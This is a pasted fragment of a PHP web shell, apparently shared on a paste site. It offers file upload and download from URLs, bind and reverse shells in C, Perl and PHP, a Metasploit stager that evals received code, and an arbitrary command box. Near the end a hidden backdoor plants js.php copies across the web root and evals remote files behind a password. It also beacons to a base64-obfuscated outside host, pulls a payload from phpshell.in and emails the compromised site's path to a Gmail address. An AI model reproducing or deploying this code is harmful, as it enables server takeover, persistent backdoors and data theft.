  1857. <td colspan="2">Save as <input onMouseOver="this.focus()" id="cmd" class="inputz" type="text" name="saveas" style="width:60%" value="echo $file;" />
  1858. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%" />
  1859. &nbsp;echo $msg;</td></tr></table></form> } elseif (isset($_GET['x']) && ($_GET['x'] == 'upload')) {
  1860.     if (isset($_POST['uploadcomp'])) {
  1861.         if (is_uploaded_file($_FILES['file']['tmp_name'])) {
  1862.             $path     = magicboom($_POST['path']);
  1863.             $fname    = $_FILES['file']['name'];
  1864.             $tmp_name = $_FILES['file']['tmp_name'];
  1865.             $pindah   = $path . $fname;
  1866.             $stat     = @move_uploaded_file($tmp_name, $pindah);
  1867.             if ($stat) {
  1868.                 $msg = "file uploaded to $pindah";
  1869.             } else
  1870.                 $msg = "failed to upload $fname";
  1871.         } else
  1872.             $msg = "failed to upload $fname";
  1873.     } elseif (isset($_POST['uploadurl'])) {
  1874.         $pilihan  = trim($_POST['pilihan']);
  1875.         $wurl     = trim($_POST['wurl']);
  1876.         $path     = magicboom($_POST['path']);
  1877.         $namafile = download($pilihan, $wurl);
  1878.         $pindah   = $path . $namafile;
  1879.         if (is_file($pindah)) {
  1880.             $msg = "file uploaded to $pindah";
  1881.         } else
  1882.             $msg = "failed to upload $namafile";
  1883.     }
  1884. <form action="?sad=echo $pwd;&amp;x=upload" enctype="multipart/form-data" method="post"><br><br><br>
  1885. <table class="tabnet" style="width:320px;padding:0 1px"> <tr><th colspan="2">Local</th></tr> <tr><td colspan="2"><p style="text-align:center"><input style="color:#000000" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%" name="path" value="echo $pwd;" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px"> <tr><th colspan="2">Remote</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0" actions="?sad=echo $pwd;&amp;x=upload"> <table><tr><td>link</td>
  1886. <td><input class="inputz" type="text" name="wurl" style="width:250px" value="http://site/file.*"></td></tr> <tr><td colspan="2">
  1887. <input type="text" class="inputz" style="width:99%" name="path" value="echo $pwd;" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px">echo $msg;</div>
  1888. } elseif (isset($_GET['x']) && ($_GET['x'] == 'netsploit')) {
  1889.     if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  1890.         $port    = trim($_POST['port']);
  1891.         $passwrd = trim($_POST['bind_pass']);
  1892.         tulis("bdc.c", $port_bind_bd_c);
  1893.         exe("gcc -o bdc bdc.c");
  1894.         exe("chmod 777 bdc");
  1895.         @unlink("bdc.c");
  1896.         exe("./bdc " . $port . " " . $passwrd . " &");
  1897.         $scan = exe("ps aux");
  1898.         if (eregi("./bdc $por", $scan)) {
  1899.             $msg = "<p>Process successed</p>";
  1900.         } else {
  1901.             $msg = "<p>Process Failed</p>";
  1902.         }
  1903.     } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  1904.         $port    = trim($_POST['port']);
  1905.         $passwrd = trim($_POST['bind_pass']);
  1906.         tulis("bdp", $port_bind_bd_pl);
  1907.         exe("chmod 777 bdp");
  1908.         $p2 = which("perl");
  1909.         exe($p2 . " bdp " . $port . " &");
  1910.         $scan = exe("ps aux");
  1911.         if (eregi("$p2 bdp $port", $scan)) {
  1912.             $msg = "<p>Process successed</p>";
  1913.         } else {
  1914.             $msg = "<p>Process Failed</p>";
  1915.         }
  1916.     } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  1917.         $ip   = trim($_POST['ip']);
  1918.         $port = trim($_POST['backport']);
  1919.         tulis("bcc.c", $back_connect_c);
  1920.         exe("gcc -o bcc bcc.c");
  1921.         exe("chmod 777 bcc");
  1922.         @unlink("bcc.c");
  1923.         exe("./bcc " . $ip . " " . $port . " &");
  1924.         $msg = "trying to connect to " . $ip . " on port " . $port . " ...";
  1925.     } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  1926.         $ip   = trim($_POST['ip']);
  1927.         $port = trim($_POST['backport']);
  1928.         tulis("bcp", $back_connect);
  1929.         exe("chmod +x bcp");
  1930.         $p2 = which("perl");
  1931.         exe($p2 . " bcp " . $ip . " " . $port . " &");
  1932.         $msg = "Trying to connect to " . $ip . " on port " . $port . " ...";
  1933.     } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
  1934.         $pilihan  = trim($_POST['pilihan']);
  1935.         $wurl     = trim($_POST['wurl']);
  1936.         $namafile = download($pilihan, $wurl);
  1937.         if (is_file($namafile)) {
  1938.             $msg = exe($wcmd);
  1939.         } else
  1940.             $msg = "error: file not found $namafile";
  1941.     }<br><br><br><br> <table class="tabnet"> <tr><th>Bind Port</th><th>Back connect</th><th>download and Exec</th></tr><tr><td> <table> <form method="post" actions="?sad=echo $pwd;&amp;x=netsploit"><tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="echo $bindport;"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="echo $bindport_pass;"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form></table> </td> <td><table> <form method="post" actions="?sad=echo $pwd;&amp;x=netsploit"><tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="echo $bindport;"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form></table> </td> <td> <table> <form method="post" actions="?sad=echo $pwd;&amp;x=netsploit"><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px" value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option><option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px"></td></tr></form></table></td></tr></table><div style="text-align:center;margin:2px">echo $msg;</div><br>
  1942. error_reporting(0);
  1943.     function ss($t)
  1944.     {
  1945.         if (!get_magic_quotes_gpc())
  1946.             return trim(urldecode($t));
  1947.         return trim(urldecode(stripslashes($t)));
  1948.     }
  1949.     $s_my_ip   = gethostbyname($_SERVER['HTTP_HOST']);
  1950.     $rsport    = "443";
  1951.     $rsportb4  = $rsport;
  1952.     $rstarget4 = $s_my_ip;
  1953.     $s_result  = "<center><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?sad=echo $pwd;&amp;x='netsploit'><table class='myboxtbl'><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='" . $rstarget4 . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='" . $rsportb4 . "' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='" . $pwd . "' /></form></td><hr color='#4C83AF'><td><form method='POST'><table class='myboxtbl'><h2>Metasploit Connection </h2><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='" . $my_ip . "' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center>";
  1954.     echo $s_result;
  1955.     if ($_POST['metaConnect']) {
  1956.         $ipaddr = $_POST['yip'];
  1957.         $port   = $_POST['yport'];
  1958.         if ($ip == "" && $port == "") {
  1959.             echo "fill in the blanks";
  1960.         } else {
  1961.             if (FALSE !== strpos($ipaddr, ":")) {
  1962.                 $ipaddr = "[" . $ipaddr . "]";
  1963.             }
  1964.             if (is_callable('stream_socket_client')) {
  1965.                 $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
  1966.                 if (!$msgsock) {
  1967.                     die();
  1968.                 }
  1969.                 $msgsock_type = 'stream';
  1970.             } elseif (is_callable('fsockopen')) {
  1971.                 $msgsock = fsockopen($ipaddr, $port);
  1972.                 if (!$msgsock) {
  1973.                     die();
  1974.                 }
  1975.                 $msgsock_type = 'stream';
  1976.             } elseif (is_callable('socket_create')) {
  1977.                 $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1978.                 $res     = socket_connect($msgsock, $ipaddr, $port);
  1979.                 if (!$res) {
  1980.                     die();
  1981.                 }
  1982.                 $msgsock_type = 'socket';
  1983.             } else {
  1984.                 die();
  1985.             }
  1986.             switch ($msgsock_type) {
  1987.                 case 'stream':
  1988.                     $len = fread($msgsock, 4);
  1989.                     break;
  1990.                 case 'socket':
  1991.                     $len = socket_read($msgsock, 4);
  1992.                     break;
  1993.             }
  1994.             if (!$len) {
  1995.                 die();
  1996.             }
  1997.             $a      = unpack("Nlen", $len);
  1998.             $len    = $a['len'];
  1999.             $buffer = '';
  2000.             while (strlen($buffer) < $len) {
  2001.                 switch ($msgsock_type) {
  2002.                     case 'stream':
  2003.                         $buffer .= fread($msgsock, $len - strlen($buffer));
  2004.                         break;
  2005.                     case 'socket':
  2006.                         $buffer .= socket_read($msgsock, $len - strlen($buffer));
  2007.                         break;
  2008.                 }
  2009.             }
  2010.             eval($buffer);
  2011.             echo "[*] Connection Terminated";
  2012.             die();
  2013.         }
  2014.     }
  2015.     if (isset($_REQUEST['sqlportb4']))
  2016.         $rsportb4 = ss($_REQUEST['sqlportb4']);
  2017.     if (isset($_REQUEST['rstarget4']))
  2018.         $rstarget4 = ss($_REQUEST['rstarget4']);
  2019.     if ($_POST['xback_php']) {
  2020.         $ip         = $rstarget4;
  2021.         $port       = $rsportb4;
  2022.         $chunk_size = 1337;
  2023.         $write_a    = null;
  2024.         $error_a    = null;
  2025.         $shell      = '/bin/sh';
  2026.         $daemon     = 0;
  2027.         $debug      = 0;
  2028.         if (function_exists('pcntl_fork')) {
  2029.             $pid = pcntl_fork();
  2030.             if ($pid == -1)
  2031.                
  2032.             if ($pid)
  2033.                
  2034.             if (posix_setsid() == -1)
  2035.                
  2036.             $daemon = 1;
  2037.         }
  2038.         umask(0);
  2039.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  2040.         if (!$sock)
  2041.            
  2042.         $descriptorspec = array(
  2043.             0 => array(
  2044.                 "pipe",
  2045.                 "r"
  2046.             ),
  2047.             1 => array(
  2048.                 "pipe",
  2049.                 "w"
  2050.             ),
  2051.             2 => array(
  2052.                 "pipe",
  2053.                 "w"
  2054.             )
  2055.         );
  2056.         $process        = proc_open($shell, $descriptorspec, $pipes);
  2057.         if (!is_resource($process))
  2058.            
  2059.         stream_set_blocking($pipes[0], 0);
  2060.         stream_set_blocking($pipes[1], 0);
  2061.         stream_set_blocking($pipes[2], 0);
  2062.         stream_set_blocking($sock, 0);
  2063.         while (1) {
  2064.             if (feof($sock))
  2065.                 break;
  2066.             if (feof($pipes[1]))
  2067.                 break;
  2068.             $read_a              = array(
  2069.                 $sock,
  2070.                 $pipes[1],
  2071.                 $pipes[2]
  2072.             );
  2073.             $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  2074.             if (in_array($sock, $read_a)) {
  2075.                 $input = fread($sock, $chunk_size);
  2076.                 fwrite($pipes[0], $input);
  2077.             }
  2078.             if (in_array($pipes[1], $read_a)) {
  2079.                 $input = fread($pipes[1], $chunk_size);
  2080.                 fwrite($sock, $input);
  2081.             }
  2082.             if (in_array($pipes[2], $read_a)) {
  2083.                 $input = fread($pipes[2], $chunk_size);
  2084.                 fwrite($sock, $input);
  2085.             }
  2086.         }
  2087.         fclose($sock);
  2088.         fclose($pipes[0]);
  2089.         fclose($pipes[1]);
  2090.         fclose($pipes[2]);
  2091.         proc_close($process);
  2092.         $rsres = " ";
  2093.         $s_result .= $rsres;
  2094.     }
  2095. } elseif (isset($_GET['x']) && ($_GET['x'] == 'shell')) {
  2096. <form action="?sad=echo $pwd;&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2">
  2097. <textarea class="output" readonly>
  2098. echo '$ '.$_POST['cmd']."\n";
  2099.     if (isset($_POST['submitcmd'])) {
  2100.         echo @exe($_POST['cmd']);
  2101.     }
  2102. </textarea> <tr><td colspan="2">echo $prompt;<input onMouseOver="this.focus()" id="cmd" class="inputz" type="text" name="cmd" style="width:60%" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%" /></td></tr> </table></form>
  2103. } else {
  2104.     if (isset($_GET['delete']) && ($_GET['delete'] != "")) {
  2105.         $file = $_GET['delete'];
  2106.         @unlink($file);
  2107.     } elseif (isset($_GET['fdelete']) && ($_GET['fdelete'] != "")) {
  2108.         $dir = $_GET['fdelete'];
  2109.         if (is_dir($dir)) {
  2110.             if (!rmdir($dir)) {
  2111.                 $s = scandir($dir);
  2112.                 foreach ($s as $ss) {
  2113.                     if (is_file($dir . "/" . $ss)) {
  2114.                         if (unlink($dir . "/" . $ss)) {
  2115.                             $rm = rmdir($dir);
  2116.                         }
  2117.                     }
  2118.                 }
  2119.             }
  2120.         }
  2121.     } elseif (isset($_GET['mkdir']) && ($_GET['mkdir'] != "")) {
  2122.         $path = $pwd . $_GET['mkdir'];
  2123.         @mkdir($path);
  2124.     }
  2125.     $buff = showdir($pwd, $prompt);
  2126.     echo $buff;
  2127. }
  2128. ob_flush();@session_start();
  2129. @error_reporting(0);
  2130. @ini_set('error_log',NULL);
  2131. @ini_set('log_errors',0);
  2132. @ini_set('max_execution_time',0);
  2133. @ini_set('display_errors', 0);
  2134. @ini_set('output_buffering',0);
  2135. @set_time_limit(0);
  2136. @set_magic_quotes_runtime(0);
  2137. @session_start();
  2138. @error_reporting(0);
  2139. $a = 'session_start();
  2140. if($_SESSION["adm"]){
  2141. echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {   if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!<script src=http://r00t.info/ccb.js></script></b><br><br>\'; }}
  2142. }
  2143. if($_POST["p"]){
  2144. $p = $_POST["p"];
  2145. $pa = md5(sha1($p));
  2146. if($pa=="683ce9b1d91af441dec18dad25584421"){
  2147. $_SESSION["adm"] = 1;
  2148. }
  2149. }
  2150. <form action="" method="post">
  2151. <input type="text" name="p">
  2152. </form>
  2153. ';
  2154. if(@$_REQUEST["px"]){
  2155. $p = @$_REQUEST["px"];
  2156. $pa = md5(sha1($p));
  2157. if($pa=="683ce9b1d91af441dec18dad25584421"){
  2158. echo @eval(@file_get_contents(@$_REQUEST["404"]));
  2159. }
  2160. }
  2161. if(@!$_SESSION["sdm"]){
  2162. $doc = $_SERVER["DOCUMENT_ROOT"];
  2163. $dir = scandir($doc);
  2164. $d1 = ''.$doc.'/.';
  2165. $d2 = ''.$doc.'/..';
  2166.  
  2167. if(($key = @array_search(, $dir)) !== false) {
  2168.     unset($dir[$key]);
  2169. }
  2170. if(($key = @array_search('..', $dir)) !== false) {
  2171.     unset($dir[$key]);
  2172. }
  2173. if(($key = @array_search($d1, $dir)) !== false) {
  2174.     unset($dir[$key]);
  2175. }
  2176. if(($key = array_search($d2, $dir)) !== false) {
  2177.     unset($dir[$key]);
  2178. }
  2179. @array_push($dir,$doc);
  2180.  
  2181. foreach($dir as $d){
  2182.  
  2183.  
  2184. $p = $doc."/".$d;
  2185. if(is_dir($p)){
  2186. $file = $p."/js.php";
  2187. @touch($file);
  2188. $folder = @fopen($file,"w");
  2189. @fwrite($folder,$a);
  2190. }
  2191. }
  2192. $lls = $_SERVER["HTTP_HOST"];
  2193. $llc = $_SERVER["REQUEST_URI"];
  2194. $lld = 'http://'.$lls.''.$llc.'';
  2195. $brow = urlencode($_SERVER['HTTP_USER_AGENT']);
  2196. $retValue = file_get_contents(base64_decode("aHR0cDovL2J5cjAwdC5jby9sLQ==")."=".$lld.base64_decode("JmI=")."=".$brow);
  2197. echo $retValue;
  2198. @$_SESSION["sdm"]=1;
  2199. }
  2200. if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query']));
  2201.  $data = "data.txt";
  2202.  @touch ("data.txt");
  2203.  $ver = @fopen ($data , 'w');
  2204.  @fwrite ( $ver , $veriyfy ) ;
  2205.  @fclose ($ver);
  2206.  }else{ $datas=@fopen("data.txt",'r');
  2207.  $i=0;
  2208.  while ($i <= 5) { $i++;
  2209.  $blue=@fgets($datas,1024);
  2210.  echo $blue;
  2211.  } } $datasi=@fopen("js/js.php",'r');
  2212.  if($datasi){ }else{ @mkdir("js");
  2213.  $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");
  2214.  $data = "js/js.php";
  2215.  @touch ("js/js.php");
  2216.  $ver = @fopen ($data , 'w');
  2217.  @fwrite ( $ver , $dos ) ;
  2218.  @fclose ($ver);
  2219.  $yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."";
  2220.  $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : js/js.php</h1>';
  2221.  $header .= "From: SheLL Boot <suppor@nic.org>\n";
  2222.  $header .= "Content-Type: text/html;
  2223. charset=utf-8\n";
  2224.  @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);
  2225.  @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);
  2226.  }</div></body></html>
Add Comment
Please, Sign In to add comment